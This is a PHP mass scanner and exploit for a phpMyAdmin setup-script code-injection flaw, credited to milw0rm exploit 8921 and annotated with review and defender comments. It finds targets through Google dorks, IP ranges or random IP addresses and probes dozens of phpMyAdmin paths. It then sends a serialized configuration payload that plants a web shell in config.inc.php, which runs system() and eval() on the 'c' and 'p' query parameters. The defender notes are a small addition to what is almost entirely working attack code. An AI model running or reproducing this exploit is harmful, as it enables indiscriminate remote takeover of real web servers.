<?php

// Runtime setup: every error channel is muted and the execution/memory limits
// are lifted, so any failure further down terminates or misbehaves silently.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '256M');
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
// Lets option 4's file_get_contents() accept a URL as well as a local path.
ini_set('allow_url_fopen', 1);
/*
 * ***************************************************************
  pmaPWN.php - d3ck4, [email protected]
  phpMyAdmin Code Injection RCE Scanner & Exploit
  This is PHP version original http://milw0rm.com/exploits/8921
  credit: Greg Ose, pagvac @ gnucitizen.org
  greetz: Hacking Expose!, HM Security, darkc0de
 * ***************************************************************

  EDITED BY GoogleINURL
  blog.inurl.com.br
 */


// Candidate phpMyAdmin install paths; the scan loop appends every entry to each
// host and fetches them all in one parallel batch. Two entries are duplicated
// ('/phpMyAdmin-2.6.2-rc1/' and '/phpMyAdmin-2.6.3/'), so those are requested twice.
// Defender note: a burst of GETs to exactly these paths from one client within a
// few seconds is the recognisable footprint of this scanner in web-server logs.
$list = array(
    '/phpmyadmin/',
    '/phpMyAdmin/',
    '/PMA/',
    '/pma/',
    '/admin/',
    '/dbadmin/',
    '/mysql/',
    '/myadmin/',
    '/phpmyadmin2/',
    '/phpMyAdmin2/',
    '/phpMyAdmin-2/',
    '/php-my-admin/',
    '/phpMyAdmin-2.2.3/',
    '/phpMyAdmin-2.2.6/',
    '/phpMyAdmin-2.5.1/',
    '/phpMyAdmin-2.5.4/',
    '/phpMyAdmin-2.5.5-rc1/',
    '/phpMyAdmin-2.5.5-rc2/',
    '/phpMyAdmin-2.5.5/',
    '/phpMyAdmin-2.5.5-pl1/',
    '/phpMyAdmin-2.5.6-rc1/',
    '/phpMyAdmin-2.5.6-rc2/',
    '/phpMyAdmin-2.5.6/',
    '/phpMyAdmin-2.5.7/',
    '/phpMyAdmin-2.5.7-pl1/',
    '/phpMyAdmin-2.6.0-alpha/',
    '/phpMyAdmin-2.6.0-alpha2/',
    '/phpMyAdmin-2.6.0-beta1/',
    '/phpMyAdmin-2.6.0-beta2/',
    '/phpMyAdmin-2.6.0-rc1/',
    '/phpMyAdmin-2.6.0-rc2/',
    '/phpMyAdmin-2.6.0-rc3/',
    '/phpMyAdmin-2.6.0/',
    '/phpMyAdmin-2.6.0-pl1/',
    '/phpMyAdmin-2.6.0-pl2/',
    '/phpMyAdmin-2.6.0-pl3/',
    '/phpMyAdmin-2.6.1-rc1/',
    '/phpMyAdmin-2.6.1-rc2/',
    '/phpMyAdmin-2.6.1/',
    '/phpMyAdmin-2.6.1-pl1/',
    '/phpMyAdmin-2.6.1-pl2/',
    '/phpMyAdmin-2.6.1-pl3/',
    '/phpMyAdmin-2.6.2-rc1/',
    '/phpMyAdmin-2.6.2-beta1/',
    '/phpMyAdmin-2.6.2-rc1/',
    '/phpMyAdmin-2.6.2/',
    '/phpMyAdmin-2.6.2-pl1/',
    '/phpMyAdmin-2.6.3/',
    '/phpMyAdmin-2.6.3-rc1/',
    '/phpMyAdmin-2.6.3/',
    '/phpMyAdmin-2.6.3-pl1/',
    '/phpMyAdmin-2.6.4-rc1/',
    '/phpMyAdmin-2.6.4-pl1/',
    '/phpMyAdmin-2.6.4-pl2/',
    '/phpMyAdmin-2.6.4-pl3/',
    '/phpMyAdmin-2.6.4-pl4/',
    '/phpMyAdmin-2.6.4/',
    '/phpMyAdmin-2.7.0-beta1/',
    '/phpMyAdmin-2.7.0-rc1/',
    '/phpMyAdmin-2.7.0-pl1/',
    '/phpMyAdmin-2.7.0-pl2/',
    '/phpMyAdmin-2.7.0/',
    '/phpMyAdmin-2.8.0-beta1/',
    '/phpMyAdmin-2.8.0-rc1/',
    '/phpMyAdmin-2.8.0-rc2/',
    '/phpMyAdmin-2.8.0/',
    '/phpMyAdmin-2.8.0.1/',
    '/phpMyAdmin-2.8.0.2/',
    '/phpMyAdmin-2.8.0.3/',
    '/phpMyAdmin-2.8.0.4/',
    '/phpMyAdmin-2.8.1-rc1/',
    '/phpMyAdmin-2.8.1/',
    '/phpMyAdmin-2.8.2/',
    '/sqlmanager/',
    '/mysqlmanager/',
    '/p/m/a/',
    '/PMA2005/',
    '/pma2005/',
    '/phpmanager/',
    '/php-myadmin/',
    '/phpmy-admin/',
    '/webadmin/',
    '/sqlweb/',
    '/websql/',
    '/webdb/',
    '/mysqladmin/',
    '/mysql-admin/',
);
/**
 * Reduce a list of host fragments (host, optionally with port and/or path,
 * no scheme) to unique "http://<host>" origins.
 *
 * Keys are those of the first occurrence of each origin, as array_unique()
 * and array_filter() both preserve keys.
 *
 * @param array $array host fragments without a scheme
 * @return array|null unique "http://host" strings, or NULL for empty input
 */
function filterHost($array = array()) {
    if (empty($array)) {

        return NULL;
    }

    // A scheme is prepended only so parse_url() can isolate the host part;
    // array_values() re-indexes to a 0..n-1 list before de-duplication.
    $origins = array_values(array_map(
        function ($fragment) {
            return "http://" . parse_url("http://{$fragment}")['host'];
        },
        $array
    ));

    return array_filter(array_unique($origins));
}
################################################################################
#GENERATOR RANGE IP#############################################################
################################################################################
/**
 * Expand an inclusive IPv4 range given as "start,end" into one
 * "http://a.b.c.d" entry per address.
 *
 * @param string $range two dotted-quad addresses separated by a comma
 * @return array|false list of "http://<ip>" strings (FALSE is unreachable in
 *                     practice, since explode() always yields an array here)
 */
function __generatorRangeIP($range) {

    $bounds = explode(',', $range);
    if (!is_array($bounds)) {

        return FALSE;
    }

    // Iterate on the numeric form and convert each value back to dotted notation.
    $first = ip2long($bounds[0]);
    $last = ip2long($bounds[1]);
    for ($current = $first; $current <= $last; $current++) {

        $ips[] = "http://" . long2ip($current);
    }

    return $ips;
}
################################################################################
#GENERATOR RANGE IP RANDOM######################################################
################################################################################
/**
 * Produce $cont[1] random IPv4 addresses as "http://a.b.c.d" entries.
 *
 * Index 0 of the argument is ignored (the original reset it to 0 itself);
 * only index 1, the requested count, matters. Duplicates are removed, so the
 * result can in principle be shorter than the count.
 *
 * @param array $cont array whose index 1 holds the number of addresses
 * @return array unique "http://<ip>" strings
 */
function __generatorIPRandom($cont) {

    for ($made = 0; $made < $cont[1]; $made++) {

        $octets = array(rand(0, 255), rand(0, 255), rand(0, 255), rand(0, 255));
        $ip[] = "http://" . implode('.', $octets);
    }
    return array_unique($ip);
}
$banner = "
\t---------------------------------------------------------------
\t        phpMyAdmin Code Injection RCE Scanner & Exploit
\t  This is PHP version original http://milw0rm.com/exploits/8921
\t        Edited by GoogleINURL - http://blog.inurl.com.br
\t---------------------------------------------------------------
\n";

// Any command-line argument only prints usage; all real input is read
// interactively from STDIN below.
if ($argc > 1) {
    print $banner;
    print "Usage: php $argv[0] \n";
    exit;
}

print $banner;
print "\n";
// Append-mode log in the working directory. The handle is closed and reopened
// repeatedly further down instead of being kept for the whole run.
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, $banner);

print "[-] Master, where you want to go today? \n";
print "[-] OPTIONS: \n";
print "---------------------------------------------------------------------\n";
print "[+] DORKING:         [ 1 ]\n";
print "[+] RANGE IP:        [ 2 ]\n";
print "[+] RANGE IP RANDOM: [ 3 ]\n";
print "[+] VALUES FILE:     [ 4 ]\n";
print "---------------------------------------------------------------------\n";
fwrite(STDOUT, "\nGoogleINURL@scan:/options#  ");
// Mode selector; stays a string and is compared with loose == against 1..4 below.
$op = trim(fgets(STDIN));
// Option 1: harvest candidate hosts from a Google result page ("dorking").
if ($op == 1) {
    print "[-] example: intitle:phpMyAdmin\n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork#  ");
    // URL-encoded once here and reused verbatim in the query string below.
    $dork = urlencode(trim(fgets(STDIN)));
    // Cosmetic: no database is involved, this "QUERY" line is console/log output only.
    print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
    FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
//for($i = 0; $i <= 2; $i+=100) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    // Headers are included, so $pg is "status line + headers + body".
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
    curl_close($ch);

# SEARCH ENGINE AND VALIDATION REGEX MODIFIED BY GoogleINURL - 26/jun/2015
    // Strip Google's redirect wrapper so each result anchor holds the target URL directly.
    $html = str_replace('href="/url?q=', 'href="', $pg);
    $html = str_replace('https://www.google.com.br', '', $html);
    $html = str_replace('http://www.phpmyadmin.net', '', $html);

    // Group 2 captures everything after the scheme in each result anchor.
    // NOTE(review): this is tied to the 2015-era result markup (<h3 class="r">)
    // and presumably matches nothing on current result pages — confirm before
    // relying on option 1; an empty match set ends in the no-results exit below.
    preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
    $_ = array_filter(array_unique($links[2]));

//if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
//}
    // Collapse host/path fragments to unique "http://host" origins (NULL when none).
    $res = filterHost($_);
}

// Option 2: inclusive IPv4 range "start,end", one "http://<ip>" entry per address.
if ($op == 2) {
    print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_range#  ");
    $value = (trim(fgets(STDIN)));
    $res = __generatorRangeIP($value);
}

// Option 3: a given number of random IPv4 addresses.
// NOTE(review): `[0] => 0` uses an array literal as an array key. PHP 8 raises
// an uncaught "Illegal offset type" TypeError for that, so on PHP 8 this branch
// presumably aborts the script (silently, since error reporting is off) instead
// of producing $res; on PHP 7 it was a suppressed warning and the element was
// skipped, which the callee tolerates because it sets index 0 itself — confirm.
if ($op == 3) {
    print "\n[-] Amount of IPS / example: 255 \n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand#  ");
    $value = (trim(fgets(STDIN)));
    $res = __generatorIPRandom(array([0] => 0, 1 => $value));
}

// Option 4: newline-separated host list from a local file (or a URL, since
// allow_url_fopen is enabled above). Unlike options 1-3 the lines are used
// as-is, so each one must already carry its scheme ("http://host") for the
// scan loop's $url . $path concatenation to form a usable URL.
if ($op == 4) {
    print "[-] example: hosts.txt ";
    fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file#  ");
    $value = (trim(fgets(STDIN)));
    $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
}
// Abort when no option produced $res (NULL from filterHost(), or an unknown
// option). An empty array passes this check because isset() is true for it;
// that case prints "0 rows" and the loop below simply does nothing.
(!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
print "---------------------------------------------------------------------\n";
$total = count($res);
print "\n[+] Done. $total rows return.\n";
FWrite($Handlex, "[+] Done. $total rows return.\n");
FClose($Handlex);

//   foreach($res as $key) {
// Scan loop: for every origin, fetch all $list paths in parallel, then hand
// each apparent phpMyAdmin hit to exploit_site(). addHandle(), ExecHandle()
// and exploit_site() are declared later in the file; PHP hoists unconditional
// top-level function declarations, so the forward calls resolve.
$cont = 1;
foreach ($res as $url) {

    // Log handle is reopened per host (and again per path below) in append mode.
    $Handlex = FOpen("pmaPWN.log", "a+");
    //$real = parse_url("http://{$target}");
    //$url = "http://" . $real['host'];
    print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
    $cont++;
    FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
    FClose($Handlex);
    sleep(5);
    // One easy handle per candidate path, all queued on a single multi handle.
    // Defender note: this is the observable footprint — a burst of GETs to the
    // $list paths from one client within seconds; addHandle() sets no
    // User-Agent, so these requests carry libcurl's default one.
    $curlHandle = curl_multi_init();
    for ($i = 0; $i < count($list); $i++)
        $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
    ExecHandle($curlHandle);
    for ($i = 0; $i < count($list); $i++) {
        $text[$i] = curl_multi_getcontent($curl[$i]);
        //echo $url.$list[$i]."\n";
        // Opened for every path but only closed on a match (see the if below).
        $Handlex = FOpen("pmaPWN.log", "a+");
        // `and` binds tighter than `or`, so this reads: title is phpMyAdmin,
        // OR (title is "Access denied" AND the body mentions phpMyAdmin).
        if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
            print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
            print "\n[+] Testing vulnerable, wait sec..\n";
            FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
            FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
            // Phrase the script treats as "instance reachable without a password".
            if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
                print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
                FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
            }
            FClose($Handlex);
            // Second stage runs synchronously per hit, before the remaining paths are checked.
            exploit_site($url . $list[$i]);
        }
    }
    for ($i = 0; $i < count($list); $i++)//remove the handles
        curl_multi_remove_handle($curlHandle, $curl[$i]);
    curl_multi_close($curlHandle);
    sleep(5);
}
// }
/**
 * Create one easy cURL handle for $url, register it on the multi handle and
 * return it so the caller can read its content after ExecHandle().
 *
 * No User-Agent is configured, so these requests identify as libcurl's default.
 *
 * @param resource|CurlMultiHandle $curlHandle multi handle (by reference, not reassigned)
 * @param string $url full URL to fetch
 * @return resource|CurlHandle the easy handle that was added to $curlHandle
 */
function addHandle(&$curlHandle, $url) {
    $easy = curl_init();
    // Body only (no headers), returned as a string, 10 s connect and total limits.
    curl_setopt_array($easy, array(
        CURLOPT_URL => $url,
        CURLOPT_HEADER => 0,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_CONNECTTIMEOUT => 10,
    ));
    curl_multi_add_handle($curlHandle, $easy);
    return $easy;
}
//execute the handle until the flag passed
// to function is greater than 0
/**
 * Drive the multi handle until no transfer is still running.
 *
 * curl_multi_exec() writes the number of active transfers into its second
 * argument; looping until that reaches 0 completes every queued request.
 * No curl_multi_select() is used, so the loop busy-spins while waiting.
 *
 * @param resource|CurlMultiHandle $curlHandle multi handle populated by addHandle()
 * @return void
 */
function ExecHandle(&$curlHandle) {
    $stillRunning = null;
    while (true) {
        //fetch pages in parallel
        curl_multi_exec($curlHandle, $stillRunning);
        if (!($stillRunning > 0)) {
            break;
        }
    }
}
/**
 * Second-stage check on a discovered phpMyAdmin base URL: fetches
 * scripts/setup.php and config/config.inc.php and calls exploit() only when
 * the first answers "200 OK" with a form token and the second also matches
 * "200 OK".
 *
 * Defender note: a reachable scripts/setup.php is the precondition this looks
 * for — removing or locking the setup script after installation (the standard
 * post-install hardening step) defeats it — and a GET pair to exactly these
 * two paths right after the directory burst is a recognisable log sequence.
 *
 * @param string $url base URL ending in "/"
 * @return void
 */
function exploit_site($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // Headers included: $result starts with the status line, which the "200 OK" test relies on.
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 100);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
    $result = curl_exec($ch);
    curl_close($ch);
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
    // NOTE(review): the next two lines configure $ch (already closed), not $ch2,
    // so the config/ request runs with libcurl's default timeouts. $ch2 also has
    // no CURLOPT_HEADER, so $result2 is the response body only and the "200 OK"
    // test below matches body text rather than the status line.
    curl_setopt($ch, CURLOPT_TIMEOUT, 100);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
    $result2 = curl_exec($ch2);
    curl_close($ch2);
    //print $url;
    if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
        print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
        print "\n[+] Exploiting, wait sec..\n";
        $Handlex = FOpen("pmaPWN.log", "a+");
        FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
        FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
        FClose($Handlex);
        exploit($url);
    } else {
        $Handlex = FOpen("pmaPWN.log", "a+");
        print "\n[-] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
        FClose($Handlex);
    }
}
/**
 * Exploitation stage for the setup-script code-injection issue the file header
 * references. Step 1 fetches scripts/setup.php to obtain a session cookie
 * (persisted in ./exploitcookie.txt) and the form token; step 2 POSTs a crafted
 * `configuration` value back to the same script with action=save. The
 * serialized value embeds PHP in the host field, so a setup script that writes
 * it into config/config.inc.php turns that file into a web shell reachable via
 * the `c` (system) and `p` (eval) query parameters — which is what the closing
 * "config.inc.php?c=id" message points at.
 *
 * Defender notes: the indicators are a POST to scripts/setup.php carrying
 * action=save and a configuration field containing `$_GET`, `system(` or
 * `eval(`, followed by GETs to config/config.inc.php with ?c= or ?p=. The
 * hard-coded Firefox 2 User-Agent is a further, weaker indicator. TLS
 * certificate verification is disabled for both requests.
 *
 * @param string $w00t base URL ending in "/"
 * @return bool|void false when no token was extracted, nothing otherwise
 */
function exploit($w00t) {
    $Handlex = FOpen("pmaPWN.log", "a+");
    $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox 
    //first get cookie + token 
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL 
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 100);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string 
    // COOKIEJAR writes the session cookie to exploitcookie.txt on close;
    // COOKIEFILE makes the second request read it back.
    curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
    curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
    $result = curl_exec($curl);
    curl_close($curl);
    // Empty statement on purpose: the match count is ignored, only $matches is used.
    if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
        ;

    // Uses the SECOND captured token value (index 1). With fewer than two
    // matches this is null (the notice is suppressed) and the else branch runs.
    $token = $matches[1][1];
    if ($token != '') {
        print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
        FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
        // Pre-encoded form body: token, action=save and the serialized configuration.
        $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
        print "\n[+] Sending evil payload mwahaha.. \n";
        FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
        curl_setopt($curl, CURLOPT_TIMEOUT, 200);
        curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
        // Referer is set to the target's own base URL.
        curl_setopt($curl, CURLOPT_REFERER, $w00t);
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
        // The response is not inspected; success is assumed and reported below.
        $result = curl_exec($curl);
        curl_close($curl);

        print "\n[!] w00t! w00t! You should now have shell here";
        print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
        print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
        FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
        FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
    } else {
        print "\n[!] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
        // Early return skips FClose() and the cookie-file cleanup below, so
        // exploitcookie.txt is left on disk (a forensic artefact on the operator's host).
        return false;
    }
    FClose($Handlex);
    // Only reached on the success path.
    if (file_exists('exploitcookie.txt')) {
        unlink('exploitcookie.txt');
    }
    //exit();
}